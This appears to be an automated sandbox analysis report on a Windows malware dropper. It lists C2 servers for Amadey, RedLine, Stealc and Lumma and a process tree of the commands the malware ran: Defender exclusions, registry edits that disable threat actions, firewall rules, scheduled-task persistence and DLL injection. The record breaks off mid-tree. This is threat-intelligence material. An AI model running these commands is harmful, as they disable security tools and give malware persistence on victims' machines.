Analysis

  • max time kernel
    150s
  • max time network
    151s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240508-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240508-enlocale:en-usos:windows10-2004-x64system
  • submitted
    16-05-2024 17:41

General

  • Target

    031c0d7f77970ec5d4bcfb75d8f06e00_NeikiAnalytics.exe

  • Size

    1.7MB

  • MD5

    031c0d7f77970ec5d4bcfb75d8f06e00

  • SHA1

    836e672c8a8c7ac88ef21948fcbc69ac0dec53ba

  • SHA256

    fdd342ee4572636303a6647cca22f566c7d367b5dd0c4da675db119592ed9fb9

  • SHA512

    0c8ddfcdfde3d28043cc4eca439f45694316f4d52ef43a2d08dd3a46b399b37ea3b91b0f439e6d90f98dd5b3e5c204a2f21bb0230d55fcf9603d554987fa4c3e

  • SSDEEP

    49152:Zo7peQmJvyES6AgZimHB+1XtV/8yBs0KWfUpLmgwQ+:CMra6AgZtB+vB8Ca6UpqgD+

Malware Config

Extracted

Family

amadey

Version

4.20

Botnet

18befc

C2

http://5.42.96.141

Attributes
  • install_dir

    908f070dff

  • install_file

    explorku.exe

  • strings_key

    b25a9385246248a95c600f9a061438e1

  • url_paths

    /go34ko8/index.php

rc4.plain

Extracted

Family

amadey

Version

4.20

Botnet

c767c0

C2

http://5.42.96.7

Attributes
  • install_dir

    7af68cdb52

  • install_file

    axplons.exe

  • strings_key

    e2ce58e78f631ed97d01fe7b70e85d5e

  • url_paths

    /zamo7h/index.php

rc4.plain

Extracted

Family

redline

Botnet

@CLOUDYTTEAM

C2

185.172.128.33:8970

Extracted

Family

redline

Botnet

1

C2

185.215.113.67:26260

Extracted

Family

stealc

Botnet

zzvv

C2

http://23.88.106.134

Attributes
  • url_path

    /c73eed764cc59dcb.php

Extracted

Family

lumma

C2

https://headraisepresidensu.shop/api

https://sofaprivateawarderysj.shop/api

https://lineagelasserytailsd.shop/api

https://tendencyportionjsuk.shop/api

https://appetitesallooonsj.shop/api

https://minorittyeffeoos.shop/api

https://prideconstituiiosjk.shop/api

https://smallelementyjdui.shop/api

Signatures

  • Amadey

    Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.

  • Lumma Stealer

    An infostealer written in C++ first seen in August 2022.

  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • RedLine payload 6 IoCs
  • RisePro

    RisePro stealer is an infostealer distributed by PrivateLoader.

  • Stealc

    Stealc is an infostealer written in C++.

  • UAC bypass 3 TTPs 1 IoCs
  • Windows security bypass 2 TTPs 2 IoCs
  • XMRig Miner payload 4 IoCs
  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 7 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 18 IoCs

    Using powershell.exe command.

  • Creates new service(s) 2 TTPs
  • Downloads MZ/PE file
  • Modifies Windows Firewall 2 TTPs 2 IoCs
  • Stops running service(s) 4 TTPs
  • Checks BIOS information in registry 2 TTPs 14 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 9 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 28 IoCs
  • Identifies Wine through registry keys 2 TTPs 3 IoCs

    Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

  • Loads dropped DLL 3 IoCs
  • Reads data files stored by FTP clients 2 TTPs

    Tries to access configuration files associated with programs like FileZilla.

  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Themida packer 43 IoCs

    Detects Themida, an advanced Windows software protection system.

  • Windows security modification 2 TTPs 3 IoCs
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Checks whether UAC is enabled 1 TTPs 6 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 4 IoCs
  • Writes to the Master Boot Record (MBR) 1 TTPs 1 IoCs

    Bootkits write to the MBR to gain persistence at a level below the operating system.

  • Suspicious use of NtSetInformationThreadHideFromDebugger 3 IoCs
  • Suspicious use of SetThreadContext 5 IoCs
  • Drops file in Program Files directory 6 IoCs
  • Drops file in Windows directory 2 IoCs
  • Launches sc.exe 9 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Program crash 11 IoCs
  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Creates scheduled task(s) 1 TTPs 5 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Kills process with taskkill 1 IoCs
  • Modifies data under HKEY_USERS 64 IoCs
  • Modifies system certificate store 2 TTPs 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 46 IoCs
  • Suspicious use of AdjustPrivilegeToken 23 IoCs
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • System policy modification 1 TTPs 1 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\031c0d7f77970ec5d4bcfb75d8f06e00_NeikiAnalytics.exe
    "C:\Users\Admin\AppData\Local\Temp\031c0d7f77970ec5d4bcfb75d8f06e00_NeikiAnalytics.exe"
    1⤵
    • Identifies VirtualBox via ACPI registry values (likely anti-VM)
    • Checks BIOS information in registry
    • Checks computer location settings
    • Checks whether UAC is enabled
    • Drops file in Windows directory
    • Suspicious use of WriteProcessMemory
    PID:3520
    • C:\Users\Admin\AppData\Local\Temp\908f070dff\explorku.exe
      "C:\Users\Admin\AppData\Local\Temp\908f070dff\explorku.exe"
      2⤵
      • Identifies VirtualBox via ACPI registry values (likely anti-VM)
      • Checks BIOS information in registry
      • Checks computer location settings
      • Executes dropped EXE
      • Adds Run key to start application
      • Checks whether UAC is enabled
      • Suspicious use of WriteProcessMemory
      PID:548
      • C:\Users\Admin\AppData\Local\Temp\908f070dff\explorku.exe
        "C:\Users\Admin\AppData\Local\Temp\908f070dff\explorku.exe"
        3⤵
          PID:4824
        • C:\Users\Admin\AppData\Local\Temp\1000013001\amers.exe
          "C:\Users\Admin\AppData\Local\Temp\1000013001\amers.exe"
          3⤵
          • Identifies VirtualBox via ACPI registry values (likely anti-VM)
          • Checks BIOS information in registry
          • Checks computer location settings
          • Executes dropped EXE
          • Identifies Wine through registry keys
          • Suspicious use of NtSetInformationThreadHideFromDebugger
          • Drops file in Windows directory
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of WriteProcessMemory
          PID:4432
          • C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe
            "C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe"
            4⤵
            • Identifies VirtualBox via ACPI registry values (likely anti-VM)
            • Checks BIOS information in registry
            • Checks computer location settings
            • Executes dropped EXE
            • Identifies Wine through registry keys
            • Suspicious use of NtSetInformationThreadHideFromDebugger
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of WriteProcessMemory
            PID:5056
            • C:\Users\Admin\AppData\Local\Temp\1000003001\alex.exe
              "C:\Users\Admin\AppData\Local\Temp\1000003001\alex.exe"
              5⤵
              • Executes dropped EXE
              • Suspicious use of SetThreadContext
              • Suspicious use of WriteProcessMemory
              PID:4488
              • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                6⤵
                • Checks computer location settings
                • Suspicious use of AdjustPrivilegeToken
                • Suspicious use of WriteProcessMemory
                PID:2588
                • C:\Users\Admin\AppData\Roaming\configurationValue\keks.exe
                  "C:\Users\Admin\AppData\Roaming\configurationValue\keks.exe"
                  7⤵
                  • Executes dropped EXE
                  • Modifies system certificate store
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  PID:3520
                • C:\Users\Admin\AppData\Roaming\configurationValue\trf.exe
                  "C:\Users\Admin\AppData\Roaming\configurationValue\trf.exe"
                  7⤵
                  • Executes dropped EXE
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  PID:3324
                • C:\Windows\SysWOW64\cmd.exe
                  "C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 3 & Del "RegAsm.exe"
                  7⤵
                  • Suspicious use of WriteProcessMemory
                  PID:4424
                  • C:\Windows\SysWOW64\choice.exe
                    choice /C Y /N /D Y /T 3
                    8⤵
                      PID:4648
                • C:\Windows\SysWOW64\WerFault.exe
                  C:\Windows\SysWOW64\WerFault.exe -u -p 4488 -s 360
                  6⤵
                  • Program crash
                  PID:3452
              • C:\Users\Admin\AppData\Local\Temp\1000004001\crypted333.exe
                "C:\Users\Admin\AppData\Local\Temp\1000004001\crypted333.exe"
                5⤵
                • Executes dropped EXE
                • Suspicious use of SetThreadContext
                • Suspicious use of WriteProcessMemory
                PID:4544
                • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                  "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                  6⤵
                    PID:2320
                • C:\Users\Admin\AppData\Local\Temp\1000005001\redline1.exe
                  "C:\Users\Admin\AppData\Local\Temp\1000005001\redline1.exe"
                  5⤵
                  • Executes dropped EXE
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  PID:4476
                • C:\Users\Admin\AppData\Local\Temp\1000006001\install.exe
                  "C:\Users\Admin\AppData\Local\Temp\1000006001\install.exe"
                  5⤵
                  • Checks computer location settings
                  • Executes dropped EXE
                  • Drops file in Program Files directory
                  • Suspicious use of WriteProcessMemory
                  PID:3504
                  • C:\Windows\SysWOW64\cmd.exe
                    C:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\GameStabilityService\installm.bat" "
                    6⤵
                    • Suspicious use of WriteProcessMemory
                    PID:3184
                    • C:\Windows\SysWOW64\sc.exe
                      Sc delete GameSyncLinks
                      7⤵
                      • Launches sc.exe
                      PID:4524
                    • C:\Program Files (x86)\GameStabilityService\GameService.exe
                      GameService remove GameSyncLinks confirm
                      7⤵
                      • Executes dropped EXE
                      PID:1236
                    • C:\Program Files (x86)\GameStabilityService\GameService.exe
                      GameService install GameStabilityService "C:\Program Files (x86)\GameStabilityService\GameStabilityService.exe"
                      7⤵
                      • Executes dropped EXE
                      PID:4544
                    • C:\Program Files (x86)\GameStabilityService\GameService.exe
                      GameService start GameStabilityService
                      7⤵
                      • Executes dropped EXE
                      PID:2964
                  • C:\Windows\SysWOW64\cmd.exe
                    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\7ZSfx000.cmd" "
                    6⤵
                      PID:2504
                  • C:\Users\Admin\AppData\Local\Temp\1000007001\swizzzz.exe
                    "C:\Users\Admin\AppData\Local\Temp\1000007001\swizzzz.exe"
                    5⤵
                    • Executes dropped EXE
                    • Suspicious use of SetThreadContext
                    PID:216
                    • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                      6⤵
                      • Loads dropped DLL
                      • Checks processor information in registry
                      • Suspicious behavior: EnumeratesProcesses
                      PID:5096
                  • C:\Users\Admin\AppData\Local\Temp\1000010001\lumma1.exe
                    "C:\Users\Admin\AppData\Local\Temp\1000010001\lumma1.exe"
                    5⤵
                    • Executes dropped EXE
                    • Suspicious use of SetThreadContext
                    PID:4304
                    • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                      6⤵
                        PID:1448
                    • C:\Users\Admin\AppData\Local\Temp\1000015001\NewB.exe
                      "C:\Users\Admin\AppData\Local\Temp\1000015001\NewB.exe"
                      5⤵
                      • Checks computer location settings
                      • Executes dropped EXE
                      PID:3452
                      • C:\Windows\SysWOW64\schtasks.exe
                        "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN NewB.exe /TR "C:\Users\Admin\AppData\Local\Temp\1000015001\NewB.exe" /F
                        6⤵
                        • Creates scheduled task(s)
                        PID:3672
                    • C:\Users\Admin\AppData\Local\Temp\1000042001\file300un.exe
                      "C:\Users\Admin\AppData\Local\Temp\1000042001\file300un.exe"
                      5⤵
                      • UAC bypass
                      • Windows security bypass
                      • Checks computer location settings
                      • Executes dropped EXE
                      • Windows security modification
                      • Checks whether UAC is enabled
                      • Suspicious use of SetThreadContext
                      • Suspicious use of AdjustPrivilegeToken
                      • System policy modification
                      PID:2512
                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\1000042001\file300un.exe" -Force
                        6⤵
                        • Command and Scripting Interpreter: PowerShell
                        • Suspicious behavior: EnumeratesProcesses
                        • Suspicious use of AdjustPrivilegeToken
                        PID:2428
                      • C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe
                        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe"
                        6⤵
                        • Suspicious use of AdjustPrivilegeToken
                        PID:4312
                        • C:\Users\Admin\Pictures\zAin5mZQbmerl3bH9oGK2zp0.exe
                          "C:\Users\Admin\Pictures\zAin5mZQbmerl3bH9oGK2zp0.exe"
                          7⤵
                          • Checks computer location settings
                          • Executes dropped EXE
                          PID:1632
                          • C:\Windows\SysWOW64\WerFault.exe
                            C:\Windows\SysWOW64\WerFault.exe -u -p 1632 -s 452
                            8⤵
                            • Program crash
                            PID:1220
                          • C:\Windows\SysWOW64\WerFault.exe
                            C:\Windows\SysWOW64\WerFault.exe -u -p 1632 -s 476
                            8⤵
                            • Program crash
                            PID:836
                          • C:\Windows\SysWOW64\WerFault.exe
                            C:\Windows\SysWOW64\WerFault.exe -u -p 1632 -s 748
                            8⤵
                            • Program crash
                            PID:1856
                          • C:\Windows\SysWOW64\WerFault.exe
                            C:\Windows\SysWOW64\WerFault.exe -u -p 1632 -s 792
                            8⤵
                            • Program crash
                            PID:1792
                          • C:\Windows\SysWOW64\WerFault.exe
                            C:\Windows\SysWOW64\WerFault.exe -u -p 1632 -s 792
                            8⤵
                            • Program crash
                            PID:1180
                          • C:\Windows\SysWOW64\WerFault.exe
                            C:\Windows\SysWOW64\WerFault.exe -u -p 1632 -s 852
                            8⤵
                            • Program crash
                            PID:2912
                          • C:\Windows\SysWOW64\WerFault.exe
                            C:\Windows\SysWOW64\WerFault.exe -u -p 1632 -s 784
                            8⤵
                            • Program crash
                            PID:4584
                          • C:\Windows\SysWOW64\WerFault.exe
                            C:\Windows\SysWOW64\WerFault.exe -u -p 1632 -s 780
                            8⤵
                            • Program crash
                            PID:1620
                          • C:\Windows\SysWOW64\WerFault.exe
                            C:\Windows\SysWOW64\WerFault.exe -u -p 1632 -s 1352
                            8⤵
                            • Program crash
                            PID:1180
                          • C:\Windows\SysWOW64\cmd.exe
                            "C:\Windows\System32\cmd.exe" /c taskkill /im "zAin5mZQbmerl3bH9oGK2zp0.exe" /f & erase "C:\Users\Admin\Pictures\zAin5mZQbmerl3bH9oGK2zp0.exe" & exit
                            8⤵
                              PID:3628
                              • C:\Windows\SysWOW64\taskkill.exe
                                taskkill /im "zAin5mZQbmerl3bH9oGK2zp0.exe" /f
                                9⤵
                                • Kills process with taskkill
                                • Suspicious use of AdjustPrivilegeToken
                                PID:5096
                            • C:\Windows\SysWOW64\WerFault.exe
                              C:\Windows\SysWOW64\WerFault.exe -u -p 1632 -s 1308
                              8⤵
                              • Program crash
                              PID:1636
                          • C:\Users\Admin\Pictures\ebId52Atmtrp14h6moNke6L8.exe
                            "C:\Users\Admin\Pictures\ebId52Atmtrp14h6moNke6L8.exe"
                            7⤵
                            • Executes dropped EXE
                            • Suspicious behavior: EnumeratesProcesses
                            • Suspicious use of AdjustPrivilegeToken
                            PID:4764
                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                              powershell -nologo -noprofile
                              8⤵
                              • Command and Scripting Interpreter: PowerShell
                              • Suspicious behavior: EnumeratesProcesses
                              • Suspicious use of AdjustPrivilegeToken
                              PID:1732
                            • C:\Users\Admin\Pictures\ebId52Atmtrp14h6moNke6L8.exe
                              "C:\Users\Admin\Pictures\ebId52Atmtrp14h6moNke6L8.exe"
                              8⤵
                              • Executes dropped EXE
                              • Modifies data under HKEY_USERS
                              PID:4724
                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                powershell -nologo -noprofile
                                9⤵
                                • Command and Scripting Interpreter: PowerShell
                                • Modifies data under HKEY_USERS
                                • Suspicious behavior: EnumeratesProcesses
                                • Suspicious use of AdjustPrivilegeToken
                                PID:3644
                              • C:\Windows\system32\cmd.exe
                                C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
                                9⤵
                                  PID:1352
                                  • C:\Windows\system32\netsh.exe
                                    netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
                                    10⤵
                                    • Modifies Windows Firewall
                                    PID:1448
                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                  powershell -nologo -noprofile
                                  9⤵
                                  • Command and Scripting Interpreter: PowerShell
                                  PID:3280
                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                  powershell -nologo -noprofile
                                  9⤵
                                  • Command and Scripting Interpreter: PowerShell
                                  PID:512
                                • C:\Windows\rss\csrss.exe
                                  C:\Windows\rss\csrss.exe
                                  9⤵
                                    PID:2568
                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                      powershell -nologo -noprofile
                                      10⤵
                                      • Command and Scripting Interpreter: PowerShell
                                      PID:2676
                                    • C:\Windows\SYSTEM32\schtasks.exe
                                      schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
                                      10⤵
                                      • Creates scheduled task(s)
                                      PID:2512
                                    • C:\Windows\SYSTEM32\schtasks.exe
                                      schtasks /delete /tn ScheduledUpdate /f
                                      10⤵
                                        PID:4848
                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                        powershell -nologo -noprofile
                                        10⤵
                                        • Command and Scripting Interpreter: PowerShell
                                        PID:3420
                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                        powershell -nologo -noprofile
                                        10⤵
                                        • Command and Scripting Interpreter: PowerShell
                                        PID:1408
                                      • C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe
                                        C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll
                                        10⤵
                                          PID:1376
                                        • C:\Windows\SYSTEM32\schtasks.exe
                                          schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
                                          10⤵
                                          • Creates scheduled task(s)
                                          PID:5480
                                        • C:\Windows\windefender.exe
                                          "C:\Windows\windefender.exe"
                                          10⤵
                                            PID:5616
                                            • C:\Windows\SysWOW64\cmd.exe
                                              cmd.exe /C sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
                                              11⤵
                                                PID:5684
                                                • C:\Windows\SysWOW64\sc.exe
                                                  sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
                                                  12⤵
                                                  • Launches sc.exe
                                                  PID:5700
                                      • C:\Users\Admin\Pictures\jv3bWamPr3RBliEnDvNa9fcf.exe
                                        "C:\Users\Admin\Pictures\jv3bWamPr3RBliEnDvNa9fcf.exe" /s
                                        7⤵
                                        • Executes dropped EXE
                                        • Loads dropped DLL
                                        • Writes to the Master Boot Record (MBR)
                                        • Suspicious behavior: EnumeratesProcesses
                                        • Suspicious use of AdjustPrivilegeToken
                                        PID:3672
                                      • C:\Users\Admin\Pictures\kY2QoVkxCJhRlimyl7l6vUjV.exe
                                        "C:\Users\Admin\Pictures\kY2QoVkxCJhRlimyl7l6vUjV.exe"
                                        7⤵
                                        • Executes dropped EXE
                                        • Suspicious behavior: EnumeratesProcesses
                                        • Suspicious use of AdjustPrivilegeToken
                                        PID:3960
                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                          powershell -nologo -noprofile
                                          8⤵
                                          • Command and Scripting Interpreter: PowerShell
                                          • Suspicious behavior: EnumeratesProcesses
                                          • Suspicious use of AdjustPrivilegeToken
                                          PID:2780
                                        • C:\Users\Admin\Pictures\kY2QoVkxCJhRlimyl7l6vUjV.exe
                                          "C:\Users\Admin\Pictures\kY2QoVkxCJhRlimyl7l6vUjV.exe"
                                          8⤵
                                          • Executes dropped EXE
                                          PID:4976
                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                            powershell -nologo -noprofile
                                            9⤵
                                            • Command and Scripting Interpreter: PowerShell
                                            • Modifies data under HKEY_USERS
                                            • Suspicious behavior: EnumeratesProcesses
                                            • Suspicious use of AdjustPrivilegeToken
                                            PID:3516
                                          • C:\Windows\system32\cmd.exe
                                            C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
                                            9⤵
                                              PID:1548
                                              • C:\Windows\system32\netsh.exe
                                                netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
                                                10⤵
                                                • Modifies Windows Firewall
                                                PID:4220
                                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                              powershell -nologo -noprofile
                                              9⤵
                                              • Command and Scripting Interpreter: PowerShell
                                              PID:836
                                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                              powershell -nologo -noprofile
                                              9⤵
                                              • Command and Scripting Interpreter: PowerShell
                                              PID:3296
                                        • C:\Users\Admin\Pictures\ioIghcpZSp20Y4Jgu8meEBNS.exe
                                          "C:\Users\Admin\Pictures\ioIghcpZSp20Y4Jgu8meEBNS.exe"
                                          7⤵
                                            PID:3388
                                            • C:\Users\Admin\AppData\Local\Temp\7zS4F5E.tmp\Install.exe
                                              .\Install.exe /tEdidDDf "385118" /S
                                              8⤵
                                                PID:4404
                                                • C:\Windows\SysWOW64\cmd.exe
                                                  "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
                                                  9⤵
                                                    PID:836
                                                    • C:\Windows\SysWOW64\forfiles.exe
                                                      forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
                                                      10⤵
                                                        PID:1856
                                                        • C:\Windows\SysWOW64\cmd.exe
                                                          /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
                                                          11⤵
                                                            PID:2800
                                                            • \??\c:\windows\SysWOW64\reg.exe
                                                              reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
                                                              12⤵
                                                                PID:3788
                                                          • C:\Windows\SysWOW64\forfiles.exe
                                                            forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
                                                            10⤵
                                                              PID:2980
                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
                                                                11⤵
                                                                  PID:1716
                                                                  • \??\c:\windows\SysWOW64\reg.exe
                                                                    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
                                                                    12⤵
                                                                      PID:4452
                                                                • C:\Windows\SysWOW64\forfiles.exe
                                                                  forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"
                                                                  10⤵
                                                                    PID:936
                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                      /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
                                                                      11⤵
                                                                        PID:1180
                                                                        • \??\c:\windows\SysWOW64\reg.exe
                                                                          reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
                                                                          12⤵
                                                                            PID:3364
                                                                      • C:\Windows\SysWOW64\forfiles.exe
                                                                        forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"
                                                                        10⤵
                                                                          PID:2812
                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                            /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
                                                                            11⤵
                                                                              PID:1216
                                                                              • \??\c:\windows\SysWOW64\reg.exe
                                                                                reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
                                                                                12⤵
                                                                                  PID:2672
                                                                            • C:\Windows\SysWOW64\forfiles.exe
                                                                              forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
                                                                              10⤵
                                                                                PID:2244
                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                  /C powershell start-process -WindowStyle Hidden gpupdate.exe /force
                                                                                  11⤵
                                                                                    PID:1652
                                                                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                      powershell start-process -WindowStyle Hidden gpupdate.exe /force
                                                                                      12⤵
                                                                                      • Command and Scripting Interpreter: PowerShell
                                                                                      PID:4768
                                                                                      • C:\Windows\SysWOW64\gpupdate.exe
                                                                                        "C:\Windows\system32\gpupdate.exe" /force
                                                                                        13⤵
                                                                                          PID:4860
                                                                                • C:\Windows\SysWOW64\forfiles.exe
                                                                                  "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m where.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"
                                                                                  9⤵
                                                                                    PID:2028
                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                      /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
                                                                                      10⤵
                                                                                        PID:1692
                                                                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                          powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
                                                                                          11⤵
                                                                                          • Command and Scripting Interpreter: PowerShell
                                                                                          PID:3628
                                                                                          • C:\Windows\SysWOW64\Wbem\WMIC.exe
                                                                                            "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
                                                                                            12⤵
                                                                                              PID:4768
                                                                                      • C:\Windows\SysWOW64\schtasks.exe
